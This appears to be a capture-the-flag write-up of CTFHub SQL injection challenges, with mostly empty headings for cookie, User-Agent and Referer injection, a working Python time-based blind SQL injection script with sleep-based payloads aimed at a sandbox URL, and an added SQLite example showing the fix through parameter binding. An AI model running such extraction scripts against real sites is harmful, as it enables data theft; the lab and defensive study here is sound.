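SQL Injection
MySQL Structure
Initial attempt:
Attempt to list the table names:
Attempt to list the column names:
The result cannot be output directly:
Use a time-based injection script to extract the result: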
import requests
import time

session = requests.session()
url = "http://challenge-8275a6b068ee702f.sandbox.ctfhub.com:10080/"
table = ""
# Candidate characters: digits 0-9 (48-57), then a-z plus { | } (97-125)
list_1 = [element for element in range(48,58)]
list_2 = [element for element in range(97,126)]
list_0 = list_1 + list_2
# Recover the value one character position at a time
for i in range(1, 50):
    print(i)
    for j in list_0:
        # payload = "1 and if(substr(database(),%d,1) ='%s',sleep(1),1)"%(i, chr(j))
        payload = "1 and if(substr((select ljvpqlbwbt from jwlaqmygfp),%d,1) = '%s',sleep(1),1)"%(i, chr(j))
        start_time = time.time()
        str_get = session.get(url=url + '?id=' + payload).text
        end_time = time.time()
        t = end_time - start_time
        # A response slower than 1 second means sleep(1) ran, so the guess matched
        if t > 1:
            table += chr(j)
            print(table)
            break
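
Why the timing script above gets an answer, and the fix, as an added example that is not part of the original writeup: the server-side query is assumed to concatenate the id value into SQL, and an in-memory SQLite database stands in for MySQL, so the row count replaces the sleep(1) delay as the observable signal. The table names, sample flag and function names are constructed for illustration; the same binding applies when the value arrives in a Cookie, User-Agent or Referer header.

```python
import sqlite3


def make_db():
    # Constructed sample data; table, column and flag values are illustrative.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news(id INTEGER, data TEXT);
        INSERT INTO news VALUES (1, 'hello');
        CREATE TABLE secret(flag TEXT);
        INSERT INTO secret VALUES ('ctfhub{constructed}');
    """)
    return db


def lookup_vulnerable(db, value):
    # Assumed server behaviour: untrusted text is pasted into the statement,
    # so everything after the number is parsed as SQL.
    return db.execute("SELECT data FROM news WHERE id = " + value).fetchall()


def lookup_safe(db, value):
    # Enforce the expected type first, then bind the value as a parameter.
    # A bound parameter is data only and is never parsed as SQL.
    try:
        ident = int(value)
    except ValueError:
        return []
    return db.execute("SELECT data FROM news WHERE id = ?", (ident,)).fetchall()


def handle(db, request, lookup):
    # The id may arrive from any request field, not only the query string.
    # Every source goes through the same lookup function.
    sources = ("query", "cookie", "user-agent", "referer")
    return {s: lookup(db, request[s]) for s in sources if s in request}


# Constructed probes in the shape of the page's payload, minus sleep():
# the condition after "and" depends on one character of the secret.
PROBE_MATCH = "1 and substr((select flag from secret),1,1) = 'c'"
PROBE_MISS = "1 and substr((select flag from secret),1,1) = 'x'"

if __name__ == "__main__":
    db = make_db()
    for probe in (PROBE_MATCH, PROBE_MISS):
        request = {"query": probe, "referer": probe}
        print("vulnerable:", handle(db, request, lookup_vulnerable))
        print("safe:      ", handle(db, request, lookup_safe))
```

With the concatenated query the two probes return different results, which is the signal the timing script measures; with the bound parameter both are rejected and the response no longer depends on the secret.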
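Cookie Injection
Test Cookie injection with Burp Suite:
UA Injection
Test User-Agent injection with Burp Suite:
View the table names:
View the column names:
View the flag:
Refer Injection
Test Referer injection with Burp Suite:
View the table names:
View the column names:
View the flag: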